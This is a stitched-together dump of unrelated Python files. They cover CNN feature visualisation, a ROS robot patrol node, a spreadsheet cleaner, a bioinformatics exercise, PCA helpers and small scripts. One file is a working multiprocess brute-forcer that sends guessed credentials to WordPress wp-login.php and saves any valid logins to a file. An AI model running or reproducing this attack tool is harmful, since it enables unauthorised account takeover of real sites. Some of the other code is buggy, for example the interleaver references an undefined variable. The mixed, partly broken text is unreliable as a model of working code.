is_maxpool = IndicesSaver(maxpool)
import torch
import torchvision
import torchvision.transforms as transforms
resize_to_tensor = transforms.Compose(
[transforms.Resize((224, 224)),
transforms.ToTensor()])
norm = transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))
testset = torchvision.datasets.CIFAR10(root='.../data', train=False,
download=True, transform=resize_to_tensor)
testloader = torch.utils.data.DataLoader(testset, batch_size=1,
shuffle=False, num_workers=0)
import zzytools
def get_reconstructed_image(ith):
input_img, label = testloader.dataset[ith]
input_img = norm(input_img)
print(label)
model(input_img.unsqueeze(0))
feature_map_target = fms_conv5_x_bb2_conv2.feature_map # ('b', 'c', 'h', 'w') # 1, 64, 112, 112
#torch.relu()
feature_map = deconv(feature_map_target, conv5_x_bb2_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv5_x_bb2_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv5_x_bb1_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv5_x_bb1_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv4_x_bb2_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv4_x_bb2_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv4_x_bb1_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv4_x_bb1_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv3_x_bb2_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv3_x_bb2_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv3_x_bb1_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv3_x_bb1_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv2_x_bb2_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv2_x_bb2_conv1)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv2_x_bb1_conv2)
feature_map = torch.relu(feature_map)
feature_map = deconv(feature_map, conv2_x_bb1_conv1)
feature_map = torch.relu(feature_map)
feature_map = torch.nn.functional.max_unpool2d(feature_map, is_maxpool.indices, 3, stride=2, padding=0, output_size=(112, 112))
feature_map = torch.relu(feature_map)
img_tensor_in = deconv(feature_map, conv1)
import cv2
#pattern_img = torch.sigmoid(img_tensor_in[0, :, :, :].transpose(0, 2)).detach().numpy()
pattern_img = img_tensor_in[0, :, :, :].transpose(0, 2).clamp(0, 1).detach()
for i in range(pattern_img.shape[2]):
pattern_img[:,:,i] = pattern_img[:,:,i] / pattern_img[:,:,i].max()
# pattern_img = pattern_img / pattern_img.max()
# pattern_img = pattern_img[:,:,:]
#pattern_img = zzytools.denormalize(pattern_img)
for i in range(pattern_img.shape[2]):
pattern_img[:,:,i] = pattern_img[:,:,i] / pattern_img[:,:,i].max()
# pattern_img = pattern_img / pattern_img.max()
return pattern_img
patterns_x16 = torch.cat([get_reconstructed_image(i).unsqueeze(0) for i in range(4531, 4531 + 16)])
zzytools.plot_rgb_images(patterns_x16.permute(1, 2, 3, 0).detach().numpy(), 'conv5_reconstruted_pattern', plot_dir='./conv5_reconstruted_pattern_trunck')
zzytools.plot_conv_feature_map(patterns_x16.permute(1, 2, 3, 0).detach().numpy(), 'conv5_reconstruted_pattern_chanel', plot_dir='./conv5_reconstruted_pattern_trunck') |
# matrix는 2차원 list
def Largest(matrix):
height = len(matrix)
width = len(matrix[0])
dp = [[0 for _ in range(width)] for _ in range(height)]
for y in range(height):
for x in range(width):
if y <= 0 or x <= 0:
continue
if matrix[y][x]==1 and matrix[y-1][x]==1 and \
matrix[y][x-1]==1 and matrix[y-1][x-1]==1:
dp[y][x] = dp[y-1][x-1]+1
result = 0
for y in range(height):
for x in range(width):
if result < dp[y][x]:
result = dp[y][x]
return (result+1)**2
print(Largest([[1,0,1,1,1],[0,0,0,1,1],[0,1,1,1,1],[0,1,1,1,1],[0,1,1,1,1]]))
print(Largest([[1,0,1,1,1],[1,1,1,1,1],[0,1,1,1,1],[0,1,1,1,1],[0,1,1,1,1]]))
|
from src.util.Build import NaveBuilder
from src.util.FabricaNaves import FabricaNavePerdida
from src.cgd import Path
class NavePerdidaBuilder(NaveBuilder):
def __init__(self):
super(NavePerdidaBuilder, self).__init__()
self.build_dano()
self.buildimagem_nave()
self.build_imagem_explosao()
self.build_som()
self.build_nave()
# """--------------ATRIBUTO----------------"""
# @override
def build_dano(self):
self.nave_product.dano = 0
# @override
def buildimagem_nave(self):
self.nave_product.imagem_nave = Path.get_path() + "Imagem/Nave/NavePerdida.png"
# @override
def build_imagem_explosao(self):
self.nave_product.imagem_explosao = Path.get_path() + "Imagem/Nave/NaveExplode.png"
# @override
def build_som(self):
self.nave_product.som = Path.get_path() + "Som/MusicNave.wav"
# @override
def build_nave(self):
self.nave_product.nave_fabrica = FabricaNavePerdida.FabricaNavePerdida(self.nave_product.imagem_nave,
self.nave_product.imagem_explosao,
self.nave_product.som)
|
# TODO: shits going kind of slow
import socket, re, itertools, ssl
from time import sleep
from os import strerror
from multiprocessing import Pool, Lock, active_children
from urllib import urlencode
global lock
lock = Lock()
class BrutePasswords(object):
def __init__(self,username,password):
self.username = username
self.password = password
self.postfields = urlencode([('log',self.username),('pwd',self.password),('wp-submit','Log+In')])
def run(self):
self.trigger = 0
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if (secure == 1): self.ssocket = ssl.wrap_socket(self.s)
else: self.ssocket = self.s
self.connmsg = self.ssocket.connect_ex((host,port))
while (self.connmsg != 0):
print("ERROR:\t%s" % strerror(self.connmsg))
sleep(2.1)
self.connmsg = self.ssocket.connect_ex((host,port))
self.ssocket.send("POST "+path+"wp-login.php HTTP/1.1\r\nContent-Length: "+str(len(self.postfields))+"\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: "+host+"\r\n\r\n"+self.postfields)
self.chunk = self.ssocket.recv(2600)
while (self.chunk.find("action=lostpassword") <= 0 and self.trigger != 8):
sleep(1)
self.chunk += self.ssocket.recv(800)
self.trigger += 1
self.ssocket.shutdown(socket.SHUT_RDWR)
self.ssocket.close()
if (self.trigger == 8):
print("Not enough data returned")
return 1
if (self.chunk.find("is incorrect") <= 0):
print("Valid login found:\t%s:%s" % (self.username,self.password))
lock.acquire()
f = open(logins,"a")
f.write("%s:%s\n" % (self.username,self.password))
f.close()
lock.release()
elif (self.chunk.find("500 Internal") > 0):
print("500 Internal Server Error seen, you may be sending too fast!")
return 1
elif (self.chunk.find("200 OK") <= 0):
print("Irregular server response seen.\n%s" % str(chunk))
return 1
return 0
def worker(passlist):
for username in usernames:
username = str(username.strip("\n"))
for password in passlist:
password = str(password.strip("\n"))
#print("%s:%s" % (username,password))
while (BrutePasswords(username,password).run() != 0): sleep(1)
def grouper(iterable,n,fillvalue=None):
it = iter(iterable)
def take():
while 1: yield list(itertools.islice(it,n))
return iter(take().next,[])
def brutePasses(userlist,passlist,hosti,pathi,porti,securei,psize,loginsi):
global host
host = hosti
global port
port = porti
global secure
secure = securei
global logins
logins = loginsi
global path
path = pathi
global usernames
usernames = userlist
usersize = len(userlist)
passsize = len(passlist)
# manage pool
if (psize == 0): psize = 5
if ((usersize*passsize) <= psize): chunksize = 1
else: chunksize = (((usersize*passsize) / psize) + ((usersize*passsize) % psize))
#print("%s" % ((ceil(float((usersize*passsize)) / psize)) + ((usersize*passsize) % psize)))
print("Userlist size: %d\tPassword size: %d\tChunk size: %d\tPool size: %d" % (usersize,passsize,chunksize,psize))
pool = Pool(processes=psize)
for chunk in itertools.izip(grouper(passlist,chunksize)): pool.map_async(worker,chunk)
pool.close()
try:
while(len(active_children()) > 0): # how many active children do we have
sleep(2)
ignore = active_children()
except KeyboardInterrupt: exit('CTRL^C caught, exiting...\n\n')
print("Password bruteforce attempts completed")
|
import pandas as pd
df = pd.read_excel(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\mtrinput.xlsx')
size = []
materiallist = []
material = []
partno = []
component = []
endstyle = []
endoptions = ["BW", "DA", "F1", "F3", "F6", "L1", "L3", "LUG", "TH", "SA", "SF", "SO", "SW", "WAFER"]
# adding pdf file extension to filename column
df["FileName(exact).pdf"] = df["FileName(exact).pdf"] + ".pdf"
# extacting the partnumber and component from the format Mars provides
for line in df["A-TPartNo."]:
partno.append(line[line.find('(') + 1:line.find(')')])
component.append(line[line.find(' ') + 1:line.find('(')])
component = [i.upper() for i in component]
partno = [i.upper() for i in partno]
# fixing formatting errors in the component column
for i, line in enumerate(component):
if component[i] == 'BLIND END':
component[i] = 'BLIND'
if component[i] == 'TSM TOP':
component[i] = 'TOP/TSM'
if component[i] == 'TSM DOWN':
component[i] = 'DOWN/TSM'
# extracting size from the part number field
size = df["A-TPartNo."].str.split(' ').str.get(0)
# extracting the heat number to be enumerated in next step
for line in df["HeatNo."]:
materiallist.append(line)
materiallist = [str(i) for i in materiallist]
materiallist = [i.upper() for i in materiallist]
# determining the material from the heat number
for number, line in enumerate(materiallist):
if materiallist[number][-1] == "W":
material.append("WCB")
elif materiallist[number][-1] == "S":
material.append("CF8M")
elif materiallist[number][-1] == "L":
material.append("CF3M")
else:
material.append("")
# writing the endstyle column from option set up in variable endoptions
for i, line in enumerate(partno):
endstyle.append("")
for end in endoptions:
if end in line:
endstyle[i] = end
# fixing formatting errors in the size column
for i, line in enumerate(size):
if size[i] == '11/2"':
size[i] = '1-1/2"'
elif size[i] == '11/4"':
size[i] = '1-1/4"'
elif size[i] == '21/2"':
size[i] = '2-1/2"'
# saving values back to df
df["Size"] = size
df["A-TPartNo."] = partno
df["Component"] = component
df["EndStyle"] = endstyle
df["Material"] = material
# output to csv file
df.to_csv(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\output.csv', index=False)
df2 = pd.read_csv(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\items.csv', usecols=['Name'], encoding='ISO-8859-1')
missing = []
items = []
# Function takes in 2 lists and compares each element from the first provided list to to second list.
def non_match_elements(list_a, list_b):
non_match = []
for i in list_a:
if i not in list_b:
non_match.append(i)
return non_match
for i in df2['Name']:
items.append(i)
missing = non_match_elements(partno, items)
if len(missing) > 0:
df3 = pd.DataFrame (missing, columns=['Missing Part Number'])
df3.to_csv(r'C:\Users\jberg\OneDrive - A-T Controls, Inc\pythonMTR\missing.csv', index=False) |
#!/usr/bin/env
# encoding: utf-8
"""
A graph whose nodes have all been labeled can be represented by an adjacency list, in which each row of the list contains the two node labels corresponding to a unique edge.
A directed graph (or digraph) is a graph containing directed edges, each of which has an orientation. That is, a directed edge is represented by an arrow instead of a line segment; the starting and ending nodes of an edge form its tail and head, respectively. The directed edge with tail v and head w is represented by (v,w) (but not by (w,v)). A directed loop is a directed edge of the form (v,v).
For a collection of strings and a positive integer k, the overlap graph for the strings is a directed graph Ok in which each string is represented by a node, and string s is connected to string t with a directed edge when there is a length k suffix of s that matches a length k prefix of t, as long as s≠t; we demand s≠t to prevent directed loops in the overlap graph (although directed cycles may be present).
Given: A collection of DNA strings in FASTA format having total length at most 10 kbp.
Return: The adjacency list corresponding to O3. You may return edges in any order.
Execute like:
python src/ex_13__overlap_graphs.py data/ex_13.txt output/ex_13.txt
"""
__author__ = 'johndibaggio'
import sys
import fileinput
argv = list(sys.argv)
def build_adjacency_matrix(edge_map, k=3):
"""
:param edge_map: map of ID to DNA string
:type edge_map: dict
:param k: size of overlap
:type k: int
:return: adjacency matrix, a list of 2-element lists, where each element is a tuple of node label and DNA string
:rtype: [[(list, str)]]
"""
adjancency_matrix = []
prefix_map = dict()
for label, dna in edge_map.items():
prefix = dna[:k]
if prefix in prefix_map:
prefix_map[prefix].append((label, dna))
else:
prefix_map[prefix] = [(label, dna)]
for label, dna in edge_map.items():
suffix = dna[-k:]
if suffix not in prefix_map:
continue
matches = prefix_map[suffix]
for match in matches:
if match[1] == dna: # Criteria to prevent directed loops (unpack DNA string from tuple (2nd element))
continue
adjancency_matrix.append([(label, dna), match])
return adjancency_matrix
def init_edge_map(filename):
"""
:param filename: file name
:type filename: str
:return: edge_map: map of ID to DNA string
:rtype: dict
"""
edge_map = dict()
dna_id = None
dna_string_builder = []
for line in fileinput.input(filename):
if line.startswith(">"):
if dna_id is not None:
edge_map[dna_id] = "".join(dna_string_builder)
dna_id = line.replace(">", "").replace("\n", "")
dna_string_builder = []
elif len(line) > 0:
dna_string_builder.extend(list(line.replace("\n", ""))) # DNA string can span multiple lines
if dna_id is not None and len(dna_string_builder) > 0:
edge_map[dna_id] = "".join(dna_string_builder)
return edge_map
k = 3
edge_map = init_edge_map(argv[1])
adjacency_matrix = build_adjacency_matrix(edge_map, 3)
# For output, separate out labels
output_adjacency_lists = []
for adjacency_list in adjacency_matrix:
labels, dna_strings = map(list, zip(*adjacency_list))
output_adjacency_lists.append(labels)
output_file = open(argv[2], 'w+')
for output_adjacency_list in output_adjacency_lists:
output_file.write(" ".join(output_adjacency_list) + '\n')
output_file.close()
|
"""Methods to assist making unit_tests"""
import string
import random
def id_generator(size=6, chars=string.ascii_uppercase + string.digits):
return "".join(random.choice(chars) for _ in range(size))
|
from django.conf.urls.defaults import *
urlpatterns = patterns('scaffold.views',
url(r'^(?P<section_path>.+)$', 'section', name="section"),
) |
#!/usr/bin/env python
#-*- codinig: UTF-8 -*-
#from launch_demo import launch_demo
import rospy
import actionlib
from actionlib_msgs.msg import *
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from nav_msgs.msg import Path
from geometry_msgs.msg import PoseWithCovarianceStamped,Twist
from tf_conversions import transformations
from math import pi
import tf
from std_srvs.srv import SetBool
from std_msgs.msg import Int32
import os
import time
import re
import subprocess
from std_srvs.srv import Trigger
import threading
import json
# import pyttsx
IS_OPEN_RVIZ="false"
def main():
rospy.wait_for_service('test')
try:
val = rospy.ServiceProxy('test', Trigger)
resp1 = val(False)
print resp1.success, resp1.message
except rospy.ServiceException, e:
print e
class navigation_demo:
def __init__(self,pos):
self.set_pose_pub = rospy.Publisher('/initialpose', PoseWithCovarianceStamped, queue_size=5)
self.move_base = actionlib.SimpleActionClient("move_base", MoveBaseAction)
self.move_base.wait_for_server(rospy.Duration(60))
print(pos)
self.init_pose_from_tf(pos)
def init_pose_from_tf(self,pos):
pose = PoseWithCovarianceStamped()
pose.header.stamp = rospy.Time.now()
pose.header.frame_id = 'map'
pose.pose.pose.position.x = pos[0][0]
pose.pose.pose.position.y = pos[0][1]
# q = transformations.quaternion_from_euler(0.0, 0.0, th/180.0*pi)
pose.pose.pose.orientation.x = pos[1][0]
pose.pose.pose.orientation.y = pos[1][1]
pose.pose.pose.orientation.z = pos[1][2]
pose.pose.pose.orientation.w = pos[1][3]
self.set_pose_pub.publish(pose)
def set_pose(self, p):
if self.move_base is None:
return False
x, y, th = p
pose = PoseWithCovarianceStamped()
pose.header.stamp = rospy.Time.now()
pose.header.frame_id = 'map'
pose.pose.pose.position.x = x
pose.pose.pose.position.y = y
q = transformations.quaternion_from_euler(0.0, 0.0, th/180.0*pi)
pose.pose.pose.orientation.x = q[0]
pose.pose.pose.orientation.y = q[1]
pose.pose.pose.orientation.z = q[2]
pose.pose.pose.orientation.w = q[3]
self.set_pose_pub.publish(pose)
return True
def _done_cb(self, status, result):
rospy.loginfo("navigation done! status:%d result:%s"%(status, result))
def _active_cb(self):
rospy.loginfo("[Navi] navigation has be actived")
def _feedback_cb(self, feedback):
# rospy.loginfo("[Navi] navigation feedback\r\n%s"%feedback)
pass
def goto(self, p):
rospy.loginfo("[Navi] goto %s"%p)
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = 'map'
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = p[0]
goal.target_pose.pose.position.y = p[1]
q = transformations.quaternion_from_euler(0.0, 0.0, p[2]/180.0*pi)
goal.target_pose.pose.orientation.x = q[0]
goal.target_pose.pose.orientation.y = q[1]
goal.target_pose.pose.orientation.z = q[2]
goal.target_pose.pose.orientation.w = q[3]
self.move_base.send_goal(goal, self._done_cb, self._active_cb, self._feedback_cb)
result = self.move_base.wait_for_result(rospy.Duration(60))
if not result:
self.move_base.cancel_goal()
rospy.loginfo("Timed out achieving goal")
else:
state = self.move_base.get_state()
if state == GoalStatus.SUCCEEDED:
rospy.loginfo("reach goal %s succeeded!"%p)
return True
def goto_array(self, p):
rospy.loginfo("[Navi] goto %s"%p[0][0])
goal = MoveBaseGoal()
goal.target_pose.header.frame_id = 'map'
goal.target_pose.header.stamp = rospy.Time.now()
goal.target_pose.pose.position.x = p[0][0]
goal.target_pose.pose.position.y = p[0][1]
# q = transformations.quaternion_from_euler(0.0, 0.0, p[2]/180.0*pi)
goal.target_pose.pose.orientation.x = p[1][0]
goal.target_pose.pose.orientation.y = p[1][1]
goal.target_pose.pose.orientation.z = p[1][2]
goal.target_pose.pose.orientation.w = p[1][3]
self.move_base.send_goal(goal, self._done_cb, self._active_cb, self._feedback_cb)
result = self.move_base.wait_for_result(rospy.Duration(60))
if not result:
self.move_base.cancel_goal()
rospy.loginfo("Timed out achieving goal")
else:
state = self.move_base.get_state()
if state == GoalStatus.SUCCEEDED:
rospy.loginfo("reach goal %s succeeded!"%p[0][0])
return True
def cancel(self):
self.move_base.cancel_all_goals()
return True
class Rc100_service:
def __init__(self):
# rospy.Service.
self.listener=tf.TransformListener()
# self.poseList=[]
self.cruisePose=CruisePose()
rospy.Subscriber('rc_partol_cmd',Int32,self.rc_call_back)
self.velCmdPub=rospy.Publisher('cmd_vel',Twist,queue_size=5)
# rospy.Service('rc_100_service',SetBool,self.rc_serv)
#self.voice_engine=pyttsx.init()
#self.voice_engine.setProperty('rate',self.voice_engine.getProperty('rate')-50)
#self.voice_engine.say("Hello, I'm T B three")
#self.voice_engine.runAndWait()
self.cnt=0
self.old_msg=-10
self.stop_partol=False
self.oldTime=rospy.Time.now()
def __del__(self):
self.cruisePose.savePose()
rospy.logerr('... after saveing pose and out...')
def rc_call_back(self,msg):
if (msg.data==self.old_msg and msg.data!=3) or (msg.data ==3 and rospy.Time.now()-self.oldTime<rospy.Duration(5)):
return
else:
self.oldTime=rospy.Time.now()
self.old_msg=msg.data
if msg.data==1:
#self.voice_engine.say("reset")
#self.voice_engine.runAndWait()
self.stop_partol=True
p3=subprocess.Popen("rosnode kill /turtlebot3_slam_gmapping",shell=True,stdout=subprocess.PIPE)
p5=subprocess.Popen("rosnode kill /move_base",shell=True,stdout=subprocess.PIPE)
#self.voice_engine.say("killed")
#self.voice_engine.runAndWait()
tw=Twist()
tw.linear.x=0
tw.angular.z=0
r = rospy.Rate(5)
for i in range(15):
self.velCmdPub.publish(tw)
r.sleep()
elif msg.data==2:
#self.voice_engine.say("2")
#self.voice_engine.runAndWait()
p1=subprocess.Popen("roslaunch turtlebot3_slam turtlebot3_slam.launch open_rviz:="+IS_OPEN_RVIZ,shell=True,stdout=subprocess.PIPE)
self.cruisePose.cruisePoseList=[]
elif msg.data==3:
while True:
cnt=0
try:
# (trans,rot) = self.listener.lookupTransform('/map', '/base_link', rospy.Time(0))
pose= self.listener.lookupTransform('/map', '/base_link', rospy.Time(0))
self.cruisePose.cruisePoseList.append(pose)
rospy.loginfo("get_on")
self.cnt+=1
#self.voice_engine.say(str(self.cnt))
#self.voice_engine.runAndWait()
break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
rospy.loginfo('there is no map transfrom ')
#self.voice_engine.say("no map")
#self.voice_engine.runAndWait()
cnt=cnt+1
if cnt>3:
break
continue
print(self.cruisePose.cruisePoseList)
if len(self.cruisePose.cruisePoseList)>=3:
# self.cruisePose.savePose()
#self.voice_engine.say("save!")
#self.voice_engine.runAndWait()
for i in range(3):
p2=subprocess.Popen("rosrun map_server map_saver -f "+os.getenv('HOME')+"/map",shell=True,stdout=subprocess.PIPE)
print('-----------------------')
# p2.wait()
time.sleep(3)
std_out_s=p2.communicate()
m=re.search('Done',std_out_s[0])
print (std_out_s[0])
if m is not None:
print ('get done')
#self.voice_engine.say("saved")
#self.voice_engine.runAndWait()
break
else:
print('fail ...')
self.cruisePose.savePose()
elif msg.data==4:
#self.voice_engine.say("4 navigation!")
#self.voice_engine.runAndWait()
self.stop_partol=False
self.cruisePose.loadPose()
t=threading.Thread(target=start_navigation,args=(self.cruisePose.cruisePoseList,self.cruisePose.initTfLink))
t.start()
class CruisePose:
def __init__(self):
self.cruisePoseList=[]
self.initTfLink=[]
self.filename='cruisePoseList.json'
def loadPose(self):
try:
with open(self.filename) as f_obj:
(self.cruisePoseList,self.initTfLink)=json.load(f_obj)
# except expression as identifier:
except :
# pass
rospy.logerr('when loading:FileNotFoundError')
else:
rospy.logerr('json load ok')
pass
def savePose(self):
listener=tf.TransformListener()
listener.waitForTransform("map", "base_footprint", rospy.Time(), rospy.Duration(4.0))
self.initTfLink = listener.lookupTransform('map', 'base_footprint', rospy.Time(0))
try:
with open(self.filename,'w') as f_obj:
json.dump((self.cruisePoseList,self.initTfLink),f_obj)
except :
rospy.logerr('when saving:FileNotFoundError')
pass
else:
rospy.logerr('json save ok')
def start_navigation(cruisePoseList,pos):
p3=subprocess.Popen("rosnode kill /turtlebot3_slam_gmapping",shell=True,stdout=subprocess.PIPE)
p5=subprocess.Popen("rosnode kill /move_base",shell=True,stdout=subprocess.PIPE)
time.sleep(3)
# p.wait()
p4=subprocess.Popen("roslaunch turtlebot3_navigation turtlebot3_navigation.launch open_rviz:="+IS_OPEN_RVIZ+" map_file:="+os.getenv('HOME')+"/map.yaml",shell=True,stdout=subprocess.PIPE)
# p4.wait()
time.sleep(10)
navi = navigation_demo(pos)
# navi.set_pose(init_pose)
while True:
for pose in cruisePoseList:
navi.goto_array(pose)
if __name__ == "__main__":
p4=subprocess.Popen("roslaunch turtlebot3_bringup turtlebot3_robot.launch",shell=True,stdout=subprocess.PIPE)
rospy.init_node('navigation_demo',anonymous=True)
# goalListX = rospy.get_param('~goalListX', '2.0, 2.0')
# goalListY = rospy.get_param('~goalListY', '2.0, 4.0')
# goalListYaw = rospy.get_param('~goalListYaw', '0, 90.0')
# goals = [[float(x), float(y), float(yaw)] for (x, y, yaw) in zip(goalListX.split(","),goalListY.split(","),goalListYaw.split(","))]
rc_s=Rc100_service()
r = rospy.Rate(1)
r.sleep()
rospy.spin()
|
../gasp/gasp_target_fitsheader_info_exclude_baddata_permonth.py |
#A string is a sequential set of characters.we can access a character by using bracket operator.
sub = "Python"
print sub[0] #This is going to print the first letter "P"
#Remeber we can't give a float values inside the brackets like sub[1.5]. It gives a TypeError.
print '\n'
#Getting the length of the given string.We have len() function to do our work.
print len(sub) #It prints 6.
print '\n'
#We can alternatively use negative indicies.
print sub[-1] #It prints the character "n".This shows that it reads the string from the reverse order.
print '\n'
#Line 3 to 8 is a simple traversal program,it shows a simple working of sequences and length operations.
sub = 'python'
index=0
while index < len(sub):
print(sub[index])
index = index+1
print '\n'
print sub[-6]
print '\n'
#This is for string slicing.
#The values inside the square braces have nothing to do with index valuue of the given string.
example = 'Python is best'
print example[10:13] #note: Prints only "bes", not the last character "t".
print example[:1] #prints p.
print example[0:6] #prints python.
#Strings are immutable
#we can't alter the given string. Because strings are immutable. we can only overcome this problem by creating a new string which is variation on the original.
#Below program gives the idea of the above statements.
print '\n'
greetings = 'Hello World!'
new_greetings = 'J' + greetings[1:]
print new_greetings #Prints Jello worls!.
new_greetings = 'J' + greetings[:2]
print new_greetings #Prints "jhe" as output.
new_greetings = 'J' + greetings[7:]
print new_greetings #Prints "Jorld!" as output.
#LOOPING & COUNTING
#The following program counts the number of times the letter "P" appers in the given string.
print '\n'
example = "python is best programming language"
count = 0
#Maintainance of proper intendation is very necessary here.
for letter in example:
if letter == 'p':
count = count + 1
print count #prints 2(remember the case sensitivity)
#Above statement also demonstartes another pattern of computation called a counter.
#THE in OPERATOR
# the word "in" is a boolean operator that takes two strings and returns True if the first appears as a substring in the second.
print '\n'
'z' in 'python' #prints 'True' and this works only in python ide >>> not in the file
print '\n'
#STRING COMPARISION
#The comparison works on the strings.To see if two strings are equal.
if sub == 'python': #declared in line number 13
print 'yeah! Its equal'
if sub < 'Python':
print('your subject'+ sub +',comes before Python')
elif sub > 'Python':
print('your subject'+ sub +',comes after Python') #this statement will be returned.
else:
print('All right,python')
|
import numpy as np
def compute_Z(X=np.array([[-1,-2],[-2,1],[4,-1],[1,1]]), centering=True, scaling=False):
if centering:
mean = np.mean(X, axis=0, keepdims=True)
print(mean)
print(X)
Z = (X - mean)
print(Z)
if scaling:
std = np.std(X, axis=1, keepdims=True)
Z = np.divide(X, std, where=std!=0)
elif scaling:
std = np.std(X, axis=1, keepdims=True)
Z = np.divide(X, std, where=std!=0)
return(Z)
def compute_covariance_matrix(Z):
return (Z.T).dot(Z)
def find_pcs(COV):
return np.linalg.eig(COV)
def project_data(Z, PCS, L, k, var):
if k != 0:
print(Z.shape)
Eigenvectors = PCS.T #first k elements
Eigenvectors = Eigenvectors[:k]
print("eigenvectors",Eigenvectors.T.shape)
projected = Z.dot(Eigenvectors.T)
print("projected",projected.shape)
return projected
if var != 0:
var_projected = [(i / sum(L)) for i in L]
var_projected_array = np.cumsum(var_projected)
k = 1
print(var_projected_array)
for variance in var_projected_array:
if var < variance:
print(variance)
Eigenvectors = PCS.T
Eigenvectors = Eigenvectors[:k]
projected = Z.dot(Eigenvectors.T)
return projected
k += 1
|
#!/usr/bin/env python
def fizzbuzz(x):
if x % 3 == 0 and x % 5 == 0: return "fizzbuzz"
elif x % 3 == 0: return "fizz"
elif x % 5 == 0: return "buzz"
return x
|
import numpy as numpy
import importlib
import random
import PHY_frame
sf1 = 31
sf2 = 64
lf1 = 11
lf2 = 21
sNi = 1024
lNi = 15120
def short_interleaver(index):
s_int = sf1*index + (sf2*index^2 % sNi)
return s_int
def long_interleaver(index):
l_int = lf1*index + (lf2*index ^2 % lNi)
return l_int
def interleave(data,typ):
res = []
z=[]
if (typ is 'short' or typ is 's'):
print 'Using short interleaver'
for k in range(0,len(x)):
z.append(short_interleaver(k%sNi))
lim=max(z)
res = [-1 for j in range(0,lim+1)]
for i in range(0,len(x)):
res[short_interleaver(i%sNi)] = data[i]
elif (typ is 'long' or typ is 'l'):
print 'Using long interleaver'
for k in range(0,len(x)):
z.append(long_interleaver(k%lNi))
lim=max(z)
res = [-1 for k in range(0,lim+1)]
for i in range(0,len(x)):
res[long_interleaver(i%lNi)] = data[i]
else:
raise Exception('Invalid input arguments')
return res
x = [i for i in range(0,500)]
#z = []
z=interleave(x,'s')
print z
#y = interleave(x,'l')
#print y
# for k in range(0,len(x)):
# z.append(long_interleaver(k%lNi))
# print max(z)
|
from mongoengine import *
import numpy as np
import datetime
import pandas
import matplotlib.pyplot as plt
import sklearn
import sklearn.preprocessing
import sklearn.model_selection
import sklearn.linear_model
from sklearn.ensemble import RandomForestRegressor
import tabulate
import requests, json
import time
import pickle
from datetime import date, datetime, timedelta
PATH_WEBCAM_JSON = "../acquisition/webcams.json"
connect("GDP-test", host = "localhost", port = 27017)
class Detection(Document):
id_webcam = IntField(required=True)
city = StringField(required=True)
location = StringField(required=True)
latitude = FloatField(required=True)
longitude = FloatField(required=True)
numPeople = IntField(required=True)
date = DateTimeField(required=True)
time = DateTimeField(required=True)
type = IntField(required=True)
weather_description = StringField()
temperature = FloatField()
day_of_week = IntField()
class weather_forecast(Document):
latitude = FloatField(required=True)
longitude = FloatField(required=True)
datetime = DateTimeField(required=True)
weather_description = StringField()
temperature = FloatField()
def predict(webcam):
print(webcam["city"])
# vedere se posso prendere solo le città per poi fare query distinte
table = pandas.DataFrame(Detection.objects(city=webcam['city'],type=0).as_pymongo()) #prelevo i dati di roma
table = table.dropna()
print(table.shape)
most_freq = lambda x: x.value_counts(dropna=True).index[0]
table_a = table
table_a = table_a.drop(columns = ['_id','id_webcam','city','type','date','location','latitude','longitude'])
table_a['time'] = pandas.to_datetime(table_a['time'])
table_a.sort_values(by='time', inplace=True)
tb = table_a.groupby([pandas.Grouper(key='time', freq='30T')], as_index=False).agg( time=('time', most_freq)
, meanPeople=('numPeople', 'mean')
, temp=('temperature','mean')
, weather=('weather_description', most_freq )
, day_of_week=('day_of_week', most_freq))
tb = tb.dropna()
tb.plot('time','meanPeople')
forecast = pandas.DataFrame(weather_forecast.objects(latitude=webcam['latitude']).as_pymongo()) #prelevo i dati di Djakovo
forecast = forecast.drop(columns = ['_id','latitude','longitude'])
forecast['datetime'] = pandas.to_datetime(forecast['datetime'])
forecast = forecast.groupby('datetime').first().reset_index()
forecast.sort_values(by='datetime', inplace=True)
today = datetime.today()
tomorrow = today + timedelta(days=1)
midnight0 = datetime.combine(today, datetime.min.time())
midnight1 = datetime.combine(tomorrow, datetime.min.time())
forecast = forecast.loc[(forecast['datetime'] >= midnight0)]
forecast = forecast.loc[(forecast['datetime'] < midnight1)].reset_index()
# print(forecast.to_markdown())
weekday = np.full((24,1),today.weekday())
fc = pandas.DataFrame()
fc.insert(0,'time', np.arange(0,24))
fc.insert(1,'temp', forecast['temperature'].iloc[0:24])
fc.insert(2,'weather', forecast['weather_description'].iloc[0:24])
fc.insert(3,'day_of_week', weekday[0:24])
print(fc)
forecast_dummies = fc['weather'].unique()
print(forecast_dummies.shape)
detection_dummies = tb['weather'].unique()
print(detection_dummies.shape)
# print(np.concatenate((forecast_dummies, detection_dummies), axis=0))
le = sklearn.preprocessing.LabelEncoder()
le.classes_ = np.unique(np.concatenate((forecast_dummies, detection_dummies), axis=0))
fc['weather'] = le.transform(fc['weather'])
tb['weather_dummy'] = le.transform(tb['weather'])
print(fc)
tb['time'] = tb['time'].dt.hour
tb = tb.dropna()
